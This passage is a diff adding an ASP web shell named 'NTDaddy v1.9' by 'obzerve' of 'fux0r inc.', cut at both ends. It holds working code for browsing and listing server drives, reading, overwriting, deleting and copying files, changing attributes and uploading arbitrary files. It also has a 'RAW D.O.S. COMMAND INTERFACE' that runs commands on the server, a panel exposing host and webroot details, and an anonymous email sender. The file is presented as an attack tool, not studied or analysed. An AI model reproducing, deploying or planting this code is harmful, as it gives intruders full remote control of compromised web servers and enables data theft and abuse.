+response.write("<br>Modified: " & f.DateLastAccessed)
+end if
+if f.DateLastModified = "" then
+response.write("<br>Accessed: ----</td></tr>")
+else
+response.write("<br>Accessed: " & f.DateLastModified & "</td></tr>")
+end if
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Attributes: " & FolderAttributes & "</td></tr>")
+response.write("</table></center></form>")
+case "OpenTextFile"
+If FilePath <> "" then
+lblioMode=Request.form("optiomode")
+lblFormat=request.form("optformat")
+set TextFile = fs.OpenTextFile (FilePath, lblioMode, lblFormat)
+TextOutput = TextFile.ReadAll   
+'TextOutput=""
+'Do While TextFile.AtEndOfStream <> True
+'       TextOutput = TextOutput & TextFile.ReadLine
+'Loop
+TextFile.close
+else
+FilePath = FolderPath
+end if
+response.write("<form name=frmTextFile action=ntdaddy.asp method=post>")
+response.write("<center><table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff width=100% height=100% >")
+response.write("<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOption value=SaveAs><input type=text size=77 name=FileName value=" & chr(34) & FilePath & chr(34) & "><select name=optUnicode><option value=FALSE>ASCII <option value=TRUE>Unicode</select></td></tr>")
+response.write("<tr><td bgcolor=#ffffff><center><textarea name=txtFile rows=20 cols=85>" & TextOutput & "</textarea></center></td></tr>")
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write("<ERROR: THIS IS NOT A TEXT FILE>")
+response.write(chr(13))
+response.write("<FilePath: " & FilePath & ">")
+response.write(chr(13))
+response.write("<ioMode: " & lblioMode & ">")
+response.write(chr(13))
+response.write("<Format: " & lblFormat & ">")
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write("<tr><td><input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & "></td></tr>")
+response.write("</table></center><p>") 
+case "ApplyFileAttributes"
+TempAtt=int(Request.form("FileAttribute1"))
+TempAtt=TempAtt + int(Request.form("FileAttribute2"))
+TempAtt=TempAtt + int(Request.form("FileAttribute3"))
+TempAtt=TempAtt + int(Request.form("FileAttribute4"))
+TempAtt=TempAtt + int(Request.form("FileAttribute5"))
+TempAtt=TempAtt + int(Request.form("FileAttribute6"))
+TempAtt=TempAtt + int(Request.form("FileAttribute7"))
+TempAtt=TempAtt + int(Request.form("FileAttribute8"))
+TempAtt=TempAtt + int(Request.form("FileAttribute9"))
+Set f = fs.GetFile(FilePath)
+f.attributes=int(TempAtt)
+response.write("File: " & FilePath & " attributes have been changed.")
+case "ApplyFolderAttributes"
+FolderPath=Request.form("RefreshFolderPath")
+TempAtt=int(Request.form("FolderAttribute1"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute2"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute3"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute4"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute5"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute6"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute7"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute8"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute9"))
+Set f = fs.Getfolder(selFolder)
+f.attributes=int(TempAtt)
+response.write("Folder: " & selFolder & " attributes have been changed.")
+end select
+Select Case TextCmd
+case "SaveAs"
+TextWrite = Request.form("txtFile")
+TextCreateFormat = Request.form("optUnicode")
+if textcreateformat = "TRUE" then
+tempmsg="Unicode"
+else
+tempmsg="ASCII"
+end if
+Set TextFile = fs.CreateTextFile(FilePath, True,TextCreateFormat)
+TextFile.Write TextWrite
+TextFile.Close
+response.write("File: " & FilePath & " Format: " & tempmsg & " has been saved.")
+end select
+%>
+<%
+Public CurrentPath
+Function ShowDriveLetters()
+on error resume next
+Dim fs, d, dc, t
+dim isReadyColor,TempSize,ShowDriveInfo
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set dc = fs.Drives
+ShowDriveInfo=Request.Form("chkShowDriveInfo")
+response.write("<form name=lstDrives action=ntdaddy.asp method=post>")
+response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>")
+if showdriveinfo="TRUE" then
+response.write("<tr colspan=8><td align=center colspan=8 bgcolor=#F8F8FF><font color=#000000><input type=checkbox name=chkShowDriveInfo value=TRUE> Show Drive Info  </td></tr>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>File System</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Serial #</u><b></td>")
+else
+response.write("<tr colspan=2><td align=center colspan=2 bgcolor=#f8f8ff><font color=#000000><input type=checkbox name=chkShowDriveInfo value=TRUE>Show Drive Info</td></tr>")
+end if
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Type</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Drive</u><b></td>")
+if showdriveinfo="TRUE" then
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Volume Name</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Share Name</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Free Space</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Total Size</u><b></td>")
+end if
+response.write("</tr>")
+For Each d in dc
+Select Case d.DriveType
+Case 0: t = "Unknown"
+Case 1: t = "Removable"
+Case 2: t = "Fixed"
+Case 3: t = "Network"
+Case 4: t = "CD-ROM"
+Case 5: t = "RAM Disk"
+End Select
+if showdriveinfo="TRUE" then
+if d.isReady then
+response.write("<TR bgcolor=#000000>")
+else
+response.write("<TR bgcolor=#191970>")
+end if
+if d.filesystem = "" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.filesystem & "</td>")
+end if
+if d.SerialNumber = "" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.SerialNumber & "</td>")
+end if
+else
+response.write("<TR>")
+end if
+response.write("<td align=center>" & t & "</td>")
+response.write("<td align=center><input type=submit name=FolderPath value=" & d.driveletter & ":\></td>")
+if showdriveinfo="TRUE" then
+if d.volumename="" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.volumename & "</td>")
+end if
+if d.sharename="" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.sharename & "</td>")
+end if
+str=""
+str=str & d.driveletter
+str=str & ":"
+'response.write(str)
+if d.isready then
+freespace = (d.AvailableSpace / 1048576)
+set sp=fs.getdrive(str)
+response.write("<td align=center>" & Round(freespace,1) & " MB</td>")
+else
+response.write("<td align=center>....</td>")
+end if
+str=""
+str=str & d.driveletter
+str=str & ":"
+'response.write(str)
+if d.isready then
+totalspace = (d.TotalSize / 1048576)
+set sp=fs.getdrive(str)
+response.write("<td align=center>" & Round(totalspace,1) & " MB</td>")
+else
+response.write("<td align=center>....</td>")
+end if
+end if
+Next
+response.write("</tr>")
+response.write("</tr></table>")
+response.write("</form>")
+End Function
+Function ShowFolderNames()
+on error resume next
+Dim fs, f, f1, s, sf ,FP
+dim ShowFolderInfo,FolderAttributes 
+ShowFolderInfo=request.form("chkShowFolderInfo")
+FP=Request.Form("FolderPath")
+if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then
+FP=request.form("RefreshFolderPath")
+IP=chr(34) & IP & chr(34)
+end if
+CurrentPath=FP
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set f = fs.GetFolder(FP)
+Set sf = f.SubFolders
+response.write("<form name=lstFolders action=ntdaddy.asp method=post>")
+response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>")
+response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=Submit name=FolderPath value=RefreshFolder></td></tr>")
+response.write("<input type=hidden name=RefreshFolderPath value=" & chr(34) &  fp & chr(34) & ">")
+response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=checkbox name=chkShowFolderInfo value=TRUE> Show Folder Info</td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=DeleteFolder><br><input type=submit name=cmdOption Value=CopyFolder> to <input type=text name=CopyFolderTo></td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=SetFolderAttributes>")
+if showfolderinfo="TRUE" then
+response.write("<TR>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Folder</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Size</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Type</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Attributes</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Created</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Accessed</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Modified</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Name</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Path</u></b></td>")
+response.write("</tr>")
+end if
+For Each f1 in sf
+if showfolderinfo="TRUE" then
+response.write("<tr>")
+response.write("<td><input type=radio name=FolderName value=" & chr(34) & FP & f1.name & chr(34) & "><Input type=submit name=FolderPath value=" & chr(34) & FP & F1.name & "\" & chr(34) & "></td>")
+response.write("<td align=center nowrap>" & FormatNumber(f1.size/1024, 0)  & " kb</td>")
+response.write("<td align=center nowrap>" & f1.type & "</td>")
+folderattributes="...."
+select case f1.attributes
+case 0
+FolderAttributes = "Normal"
+case 1
+FolderAttributes = "Read Only"
+case 2
+FolderAttributes = "Hidden"
+case 3  'Extra
+FolderAttributes = "Read Only, Hidden"
+case 4
+FolderAttributes = "System"
+case 7  'Extra
+FolderAttributes = "Read Only, Hidden, System"
+case 8
+FolderAttributes = "Volume"
+case 16
+FolderAttributes = "Directory"
+case 17 'Extra
+FolderAttributes = "Read Only, Directory"
+case 18 'Extra
+FolderAttributes = "Hidden, Directory"
+case 19
+FolderAttributes = "Read Only, Hidden, Directoy"
+case 20 'Extra
+FolderAttributes = "System, Directory"
+case 22 'Extra
+FolderAttributes = "Hidden, System. Directory"
+case 23
+FolderAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FolderAttributes = "Archive"
+case 33 'Extra
+FolderAttributes = "Read Only, Archive"
+case 34 'Extra
+FolderAttributes = "Hidden, Archive"
+case 38 'Extra
+FolderAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FolderAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FolderAttributes = "Directory, Archive"
+case 64
+FolderAttributes = "Alias"
+case 128
+FolderAttributes = "Compressed"
+case else
+FolderAttributes = f1.attributes
+end select
+response.write("<td align=center nowrap>" & FolderAttributes & "</td>")
+if f1.datecreated = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datecreated & "</td>")
+end if
+if f1.datelastaccessed = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastaccessed & "</td>")
+end if
+if f1.datelastmodified = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastmodified & "</td>")
+end if
+response.write("<td align=center nowrap>" & f1.shortname & "</td>")
+response.write("<td align=center nowrap>" & f1.shortpath & "\</td></tr>")
+else
+response.write("<tr><td><input type=radio name=FolderName value=" & chr(34) & FP & f1.name & chr(34) & "><Input type=submit name=FolderPath value=" & chr(34) & FP & F1.name & "\" & chr(34) & "></td></tr>")
+end if
+Next
+response.write("</table>")
+response.write("</form>")
+End Function
+Function ShowFileNames()
+on error resume next
+Dim fs, f, f1, fc, FP
+dim ShowFileInfo,FileAttributes,ShowPrefix
+ShowPrefix=request.form("txtShowPrefix")
+ShowFileInfo=Request.form("chkShowFileInfo")
+FP=Request.Form("FolderPath")
+if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then
+FP=request.form("RefreshFolderPath")
+IP=chr(34) & IP & chr(34)
+end if
+CurrentPath=FP
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set f = fs.GetFolder(FP)
+Set fc = f.Files
+response.write("<form name=lstFiles action=ntdaddy.asp method=post>")
+response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>")
+response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=submit value=RefreshFiles> <input type=checkbox name=chkShowFileInfo value=TRUE> Show File Info &<br>Show Only:  <input type=text name=txtShowPrefix value= ></td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=DeleteFile><input type=submit name=cmdOption Value=CopyFile> to <input type=text name=CopyFileTo></td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=OpenTextFile><select name=optioMode><option value=" & chr(34) & "1" & chr(34) & ">For Reading <option value="& chr(34) & "2" & chr(34) & ">For Writing <option value=" & chr(34) & "8" & chr(34) & ">For Appending</select><select name=optformat><option value=" & chr(34) & "-2" & chr(34) & ">System Default <option value=" & chr(34) & "-1" & chr(34) & ">Unicode <option value=" & chr(34) & "0" & chr(34) & ">ASCII</select></td>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=SetFileAttributes>")
+response.write("<input type=hidden name=FolderPath Value=" & chr(34) & fp & chr(34) & "></tr>")
+if showfileinfo="TRUE" then
+response.write("<TR>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>File</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Size</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Type</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Attributes</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Created</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Accessed</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Modified</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Name</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Path</u></b></td>")
+response.write("</tr>")
+end if
+For Each f1 in fc
+if showfileinfo="TRUE" then
+if lcase(right(f1.name,(len(ShowPrefix)))) = lcase(ShowPrefix) then
+response.write("<tr>")
+response.write("<td align=center nowrap><input type=radio name=FileName value=" & chr(34) & FP & f1.name & chr(34) & ">" & f1.name & "</td>")
+response.write("<td align=center nowrap>" & FormatNumber(f1.size/1024, 0)  & " kb</td>")
+response.write("<td align=center nowrap>" & f1.type & "</td>")
+select case f1.attributes
+case 0
+FileAttributes = "Normal"
+case 1
+FileAttributes = "Read Only"
+case 2
+FileAttributes = "Hidden"
+case 3  'Extra
+FileAttributes = "Read Only, Hidden"
+case 4
+FileAttributes = "System"
+case 7  'Extra
+FileAttributes = "Read Only, Hidden, System"
+case 8
+FileAttributes = "Volume"
+case 16
+FileAttributes = "Directory"
+case 19
+FileAttributes = "Read Only, Hidden, Directoy"
+case 23
+FileAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FileAttributes = "Archive"
+case 33 'Extra
+FileAttributes = "Read Only, Archive"
+case 34 'Extra
+FileAttributes = "Hidden, Archive"
+case 38 'Extra
+FileAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FileAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FileAttributes = "Directory, Archive"
+case 64
+FileAttributes = "Alias"
+case 128
+FileAttributes = "Compressed"
+case else
+FileAttributes = f1.attributes
+end select
+response.write("<td align=center nowrap>" & FileAttributes & "</td>")
+if f1.datecreated = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datecreated & "</td>")
+end if
+if f1.datelastaccessed = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastaccessed & "</td>")
+end if
+if f1.datelastmodified = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastmodified & "</td>")
+end if
+response.write("<td align=center nowrap>" & f1.shortname & "</td>")
+response.write("<td align=center nowrap>" & f1.shortpath & "</td></tr>")
+end if
+else
+if lcase(right(f1.name,(len(ShowPrefix)))) = lcase(ShowPrefix) then
+response.write("<tr><td><input type=radio name=FileName value=" & chr(34) & FP & f1.name & chr(34) & ">" & f1.name & "</td></tr>")
+end if
+end if
+Next
+response.write("</table>")
+response.write("</form>")
+End Function
+%>
+<STYLE>
+BODY
+{scrollbar-face-color: #f8f8ff; scrollbar-shadow-color: #cccccc;
+scrollbar-highlight-color: #cccccc; scrollbar-3dlight-color: #cccccc;
+scrollbar-darkshadow-color: #000000; scrollbar-track-color: #000000;
+scrollbar-arrow-color: #000000}
+</STYLE>
+</head>
+<body bgcolor=#000000 text=#ffffff>
+<center>
+<font size="18" color="#ffffff">NTDaddy | fux0r inc.</font>
+<hr color="#ffffff">
+<table border=1 width="100%" color="#fffff">
+<tr>
+<td align=center width=100% bgcolor=#ffffff><font color=#000000><a name=lblCurrentPath value=
+<% 
+FP=Request.Form("FolderPath")
+if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then
+FP=request.form("RefreshFolderPath")
+end if
+response.write(chr(34) & IP & chr(34) & ">" & FP)
+%>
+</a></td>
+</tr>
+</table>
+<table border=0 cellspacing=1 bordercolor="#ffffff" width=100% height=100%>
+<tr colspan=3><td align=left colspan=3><% =ShowDriveLetters() %></td>
+<td align=center></td></tr>
+<tr valign=top width=100%><td align=left><% =ShowFolderNames() %></td>
+<td align=right><% =ShowFileNames() %></td>
+</tr>
+</table>
+<br><hr color="#ffffff"><br>
+<table cellpadding="3" cellspacing="3" border="5" bordercolor="#ffffff">
+<tr>
+<td align="left" bgcolor="#F8F8FF">
+<font color="#000000" size="4"><b>• Remote Info.</b></font>
+</td>
+<td align="left" bgcolor="#F8F8FF">
+<font color="#000000" size="4"><b>• Local Info.</b></font>
+</td>
+</tr>
+<tr>
+<td align=left>
+<div align=left><font size="3">
+<b>User</b>: <%= "\\" & oScriptNet.ComputerName & " \ " & oScriptNet.UserName %> <br>
+<b>ID</b>: <%=request.servervariables("SERVER_NAME")%> <br>
+<b>IP</b>: <%=request.servervariables("LOCAL_ADDR")%> <br>
+<b>HTTPD</b>: <%=request.servervariables("SERVER_SOFTWARE")%> <b>Port</b>: <%=request.servervariables("SERVER_PORT")%> <br>
+<b>Webroot</b>: <%=request.servervariables("APPL_PHYSICAL_PATH")%> <br>
+<b>LogRoot</b>: <%=request.servervariables("APPL_MD_PATH")%> <br>
+<b>Date</b>: <% =date() %> <br>
+<b>Time</b>: <%=time() %> <br>
+<b>HTTPs</b>: <%=request.servervariables("HTTPS")%>
+<br></font></div>
+</td>
+<td align="left" valign="top">
+<b>Local Addr (What they see.)</b>: <%=request.servervariables("REMOTE_ADDR")%> <br>
+<b>Forwarded from</b> : <%=request.servervariables("HTTP_X_FORWARDED_FOR")%> <br>
+<b>Via</b>: <%=request.servervariables("HTTP_VIA")%> <br>
+<b>User Agent</b>: <%=request.servervariables("HTTP_USER_AGENT")%> <br>
+<b>Wookie</b>: <%=request.servervariables("HTTP_WOOKIE")%> <br>
+<b>Cache Control</b>: <%=request.servervariables("HTTP_CACHE_CONTROL")%> <br>
+<b>Interface</b>: <%=request.servervariables("GATEWAY_INTERFACE")%> <br>
+<b>Protocol</b>: <%=request.servervariables("SERVER_PROTOCOL")%> <br>
+<b>Method</b>: <%=request.servervariables("REQUEST_METHOD")%>
+</td>
+</tr>
+</table>
+<br>
+<hr color="#ffffff">
+<br>
+<table cellpadding="3" cellspacing"1" bordercolor="#F8F8FF" border=5>
+<tr>
+<td align="left" bgcolor="#F8F8FF">
+<font size="2" color="#000000"><b>• File Upload Utility</b></font></td>
+</tr>
+<tr>
+<td align="left">
+<form method=post ENCTYPE="multipart/form-data">
+<b>File</b> : <input type="file" size="35" name="File1"><br>
+<input type="submit" Name="Action" value="Upload the file">
+</form></td>
+</tr>
+<tr>
+<td align="left" bgcolor="#F8F8FF">
+<font size="2" color="#000000"><b>• RAW D.O.S. COMMAND INTERFACE</b></font></td>
+</tr>
+<tr valign="top">
+<td align="left">
+<form action="<%= Request.ServerVariables("URL") %>" method="POST">
+<p><input type="text" name=".CMD" size="45" value="<%= szCMD %>"> <input type="submit" value="Run"> </p>
+</form>
+<pre>
+<%
+If (IsObject(oFile)) Then
+On Error Resume Next
+Response.Write Server.HTMLEncode(oFile.ReadAll)
+oFile.Close
+Call oFileSys.DeleteFile(szTempFile, True)
+End If%>
+</pre>
+</td>
+</tr>
+</table>
+<br>
+<hr color="#ffffff">
+<br>
+<form action=ntdaddy.asp method=post>
+<form action=ntdaddy.asp method=post>
+<table border=3 cellpadding="3" cellspacing="2" bordercolor="#ffffff" width="400">
+<tr>
+<td bgcolor="#F8F8FF" colspan="2"><font color="#000000" align="left"><b>• Anonymous Email Utility</b></font></td>
+<tr>
+<td bgcolor="#F8F8FF"><font color="#000000"><b>From:</b></font> </td>
+<td><input name=From size=30 style="HEIGHT: 22px; WIDTH: 321px"></td></tr>
+<tr>
+<td bgcolor="#F8F8FF"><font color="#000000"><b>To:</b></font> </td>
+<td><input name=To size=30 style="HEIGHT: 22px; WIDTH: 321px"></td></tr>
+<tr>
+<td bgcolor="#F8F8FF"><font color="#000000"><b>Subject:</b></font> </td>
+<td><input name=Subject size=30 style="HEIGHT: 22px; WIDTH: 321px"></td></tr>
+<tr>
+<td valign="top" bgcolor="#F8F8FF"><font color="#000000"><b>Body:</b></font> </td>
+<td><textarea cols=30 name=Body rows=5 style="HEIGHT: 86px; WIDTH: 322px" wrap=virtual></textarea></td>
+</tr>
+<tr>
+<td align="right" bgcolor="#F8F8FF" colspan="2">
+<input type="submit" value="Send Mail">
+<input type="hidden" name="flag" value="1"></td>
+</tr>
+</table>
+<br>
+<hr color="#ffffff">
+<font size="#ffffff"><center>•[ <b>NTDaddy v1.9</b> ][ by obzerve ][ for the brothers of <b>fux0r inc.</b> 2k+1 ]•</b></center></font>
+</body>
+</html>
+<SCRIPT RUNAT=SERVER LANGUAGE=VBSCRIPT>
+Const IncludeType = 2 
+Dim UploadSizeLimit
+Function GetUpload()
+Dim Result
+Set Result = Nothing
+If Request.ServerVariables("REQUEST_METHOD") = "POST" Then 
+Dim CT, PosB, Boundary, Length, PosE
+CT = Request.ServerVariables("HTTP_Content_Type") 
+If LCase(Left(CT, 19)) = "multipart/form-data" Then 
+PosB = InStr(LCase(CT), "boundary=") 
+If PosB > 0 Then Boundary = Mid(CT, PosB + 9) 
+PosB = InStr(LCase(CT), "boundary=") 
+If PosB > 0 then 
+PosB = InStr(Boundary, ",")
+If PosB > 0 Then Boundary = Left(Boundary, PosB - 1)
+end if
+Length = CLng(Request.ServerVariables("HTTP_Content_Length")) 
+If "" & UploadSizeLimit <> "" Then
+UploadSizeLimit = CLng(UploadSizeLimit)
+If Length > UploadSizeLimit Then
+Request.BinaryRead (Length)
+Err.Raise 2, "GetUpload", "Upload size " & FormatNumber(Length, 0) & "B exceeds limit of " & FormatNumber(UploadSizeLimit, 0) & "B"
+Exit Function
+End If
+End If
+If Length > 0 And Boundary <> "" Then 
+Boundary = "--" & Boundary
+Dim Head, Binary
+Binary = Request.BinaryRead(Length) 
+Set Result = SeparateFields(Binary, Boundary)
+Binary = Empty 
+Else
+Err.Raise 10, "GetUpload", "Zero length request ."
+End If
+Else
+Err.Raise 11, "GetUpload", "No file sent."
+End If
+Else
+Err.Raise 1, "GetUpload", "Bad request method."
+End If
+Set GetUpload = Result
+End Function
+Function SeparateFields(Binary, Boundary)
+Dim PosOpenBoundary, PosCloseBoundary, PosEndOfHeader, isLastBoundary
+Dim Fields
+Boundary = StringToBinary(Boundary)
+PosOpenBoundary = InStrB(Binary, Boundary)
+PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary, 0)
+Set Fields = CreateObject("Scripting.Dictionary")
+Do While (PosOpenBoundary > 0 And PosCloseBoundary > 0 And Not isLastBoundary)
+Dim HeaderContent, FieldContent, bFieldContent
+Dim Content_Disposition, FormFieldName, SourceFileName, Content_Type
+Dim Field, TwoCharsAfterEndBoundary
+PosEndOfHeader = InStrB(PosOpenBoundary + Len(Boundary), Binary, StringToBinary(vbCrLf + vbCrLf))
+HeaderContent = MidB(Binary, PosOpenBoundary + LenB(Boundary) + 2, PosEndOfHeader - PosOpenBoundary - LenB(Boundary) - 2)
+bFieldContent = MidB(Binary, (PosEndOfHeader + 4), PosCloseBoundary - (PosEndOfHeader + 4) - 2)
+GetHeadFields BinaryToString(HeaderContent), Content_Disposition, FormFieldName, SourceFileName, Content_Type
+Set Field = CreateUploadField() 
+Set FieldContent = CreateBinaryData()
+FieldContent.ByteArray = bFieldContent
+FieldContent.Length = LenB(bFieldContent)
+Field.Name = FormFieldName
+Field.ContentDisposition = Content_Disposition
+Field.FilePath = SourceFileName
+Field.FileName = GetFileName(SourceFileName)
+Field.ContentType = Content_Type
+Field.Length = FieldContent.Length
+Set Field.Value = FieldContent
+Fields.Add FormFieldName, Field
+TwoCharsAfterEndBoundary = BinaryToString(MidB(Binary, PosCloseBoundary + LenB(Boundary), 2))
+isLastBoundary = TwoCharsAfterEndBoundary = "--"
+If Not isLastBoundary Then 
+PosOpenBoundary = PosCloseBoundary
+PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary)
+End If
+Loop
+Set SeparateFields = Fields
+End Function
+Function GetHeadFields(ByVal Head, Content_Disposition, Name, FileName, Content_Type)
+Content_Disposition = LTrim(SeparateField(Head, "content-disposition:", ";"))
+Name = (SeparateField(Head, "name=", ";")) 
+If Left(Name, 1) = """" Then Name = Mid(Name, 2, Len(Name) - 2)
+FileName = (SeparateField(Head, "filename=", ";")) 
+If Left(FileName, 1) = """" Then FileName = Mid(FileName, 2, Len(FileName) - 2)
+Content_Type = LTrim(SeparateField(Head, "content-type:", ";"))
+End Function
+Function SeparateField(From, ByVal sStart, ByVal sEnd)
+Dim PosB, PosE, sFrom
+sFrom = LCase(From)
+PosB = InStr(sFrom, sStart)
+If PosB > 0 Then
+PosB = PosB + Len(sStart)
+PosE = InStr(PosB, sFrom, sEnd)
+If PosE = 0 Then PosE = InStr(PosB, sFrom, vbCrLf)
+If PosE = 0 Then PosE = Len(sFrom) + 1
+SeparateField = Mid(From, PosB, PosE - PosB)
+Else
+SeparateField = Empty
+End If
+End Function
+Function GetFileName(FullPath)
+Dim Pos, PosF
+PosF = 0
+For Pos = Len(FullPath) To 1 Step -1
+Select Case Mid(FullPath, Pos, 1)
+Case "/", "\": PosF = Pos + 1: Pos = 0
+End Select
+Next
+If PosF = 0 Then PosF = 1
+GetFileName = Mid(FullPath, PosF)
+End Function
+Function BinaryToString(Binary)
+dim cl1, cl2, cl3, pl1, pl2, pl3
+Dim L
+cl1 = 1
+cl2 = 1
+cl3 = 1
+L = LenB(Binary)
+Do While cl1<=L
+pl3 = pl3 & Chr(AscB(MidB(Binary,cl1,1)))
+cl1 = cl1 + 1
+cl3 = cl3 + 1
+if cl3>300 then
+pl2 = pl2 & pl3
+pl3 = ""
+cl3 = 1
+cl2 = cl2 + 1
+if cl2>200 then
+pl1 = pl1 & pl2
+pl2 = ""
+cl2 = 1
+End If
+End If
+Loop
+BinaryToString = pl1 & pl2 & pl3
+End Function
+Function BinaryToStringold(Binary)
+Dim I, S
+For I = 1 To LenB(Binary)
+S = S & Chr(AscB(MidB(Binary, I, 1)))
+Next
+BinaryToString = S
+End Function
+Function StringToBinary(String)
+Dim I, B
+For I=1 to len(String)
+B = B & ChrB(Asc(Mid(String,I,1)))
+Next
+StringToBinary = B
+End Function
+Function vbsSaveAs(FileName, ByteArray)
+Dim FS, TextStream
+Set FS = CreateObject("Scripting.FileSystemObject")
+Set TextStream = FS.CreateTextFile(FileName)
+TextStream.Write BinaryToString(ByteArray) 
+TextStream.Close
+End Function
+</SCRIPT>
+<SCRIPT RUNAT=SERVER LANGUAGE=JSCRIPT>
+function CreateUploadField(){ return new uf_Init() }
+function uf_Init(){
+this.Name = null
+this.ContentDisposition = null
+this.FileName = null
+this.FilePath = null
+this.ContentType = null
+this.Value = null
+this.Length = null
+}
+function CreateBinaryData(){ return new bin_Init() }
+function bin_Init(){
+this.ByteArray = null
+this.Length = null
+this.String = jsBinaryToString
+this.SaveAs = jsSaveAs
+}
+function jsBinaryToString(){
+return BinaryToString(this.ByteArray)
+}
+function jsSaveAs(FileName){
+return vbsSaveAs(FileName, this.ByteArray)
+}
+</SCRIPT>
+<%
+If Request.ServerVariables("REQUEST_METHOD") = "POST" Then 
+Set Fields = GetUpload()
+FilePath = Server.MapPath(".") & "\" & Fields("File1").FileName
